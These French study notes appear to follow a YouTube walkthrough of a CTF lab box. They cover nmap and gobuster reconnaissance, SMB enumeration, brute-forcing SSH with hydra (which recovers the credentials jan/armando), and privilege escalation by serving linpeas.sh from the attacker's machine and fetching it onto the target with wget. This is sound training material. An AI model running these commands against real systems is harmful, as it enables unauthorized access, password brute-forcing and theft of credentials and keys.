https://www.youtube.com/watch?

v=ZCuStkgjwM8

Phase1: reconnaissance:

nmap: scanner les cibles et vérifier les ports ouverts et les services activés
-sV: version des services
-sC: utiliser un script d'enumération classique
-O: détecter l'OS de la cible
on peut remplacer ces trois options par l'option -A
-p: spécifier les ports qu'on veut scanner
-p-: scanner tous les ports TCP
-v: identifier au fur et à mesure les ports ouverts qui sont les résultats de -p-
-oA: enregistrer le résultat du scan dans tous les formats possibles
10.10.96.109: ip de la cible

nmap -A -p- -v -oA basic_nmap 10.10.96.109

=> ports ouverts : 22 8080 80 445 139
au niveau du browser: 10.10.96.109
clic droit + view source (on peut trouver quelques infos)
puis on teste les pages faciles et communs que les developpeurs utilisent ça peut
vous avancer très rapidement par rapport aux autres outils
10.10.96.109/robots.txt
10.10.96.109/admin.php

gobuster: automatiser le process d'exploration du site web (brute force par

dictionnaire: directory bruteforce)
dir: le mettre en mode directory
-w: indiquer le dictionnaire à utiliser
-x: indiquer les extensions des fichier qu'il doit chercher (il va tester le mot du
dictionnaire de plus le mot avec l'extension en tant que fichier exmpl: mot:
bonjour / file:bonjour.txt)
-u: URL cible
gobuster dir -w /usr/share/wordlists/dirbuster/directory_name -x php,txt,html -u
http://10.10.96.109

enum4linux: énumération automatisée (similaire à nmap mais avec plus de détails)

enum4linux 10.10.96.109

smbclient: getting files from the server to the local machine, putting files from
the local machine to the server, retrieving directory information from the server
and so on.
-L: services available on a server
smbclient -L \\\\host\\
smbclient \\\\host\\sharename\\
smb> help: lister toutes les commandes possibles
smb> dir: lister les composants du sharename
smb> get staff.txt: télécharger le fichier au niveau du repertoire courant

Phase2: exploitation:

thc hydra: faire le bruteforce sur pas mal de services

-l: user
-P: dictionnaire à utiliser pour le bruteforce
-V: afficher toutes les tentatives que va faire hydra sur ssh
host: la cible
ssh: le service à attaquer
hydra -l jan -P /usr/share/worldlists/rockyou.txt host ssh
=> login: jan password: armando
Phase3: Privilege Escalation

se connecter avec ssh en tant que jan

linPEAS: script qui cherche les paths possibles pour l'élévation de privilèges
télécharger le script
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
> linpeas.sh
création d'un serveur http
python3 -m http.server 80
récupérer l'@ip de l'attaquant => 10.9.186.239
en tant que jan:
wget http://10.9.186.239:80/linpeas.sh (if permission denied : cannot write to
linpeas.sh -> cd /tmp (on a le droit d'écriture au niveau de ce dossier) et on
exécude de nouveau la commande: wget http://10.9.186.239:80/linpeas.sh)
chmod +x linpeas.sh
./linpeas.sh => on cherche les clés ssh
si les clés sont cryptés, on suit la démarche de ce site: https://null-
byte.wonderhowto.com/how-to/crack-ssh-private-key-passwords-with-john-ripper-
0302810/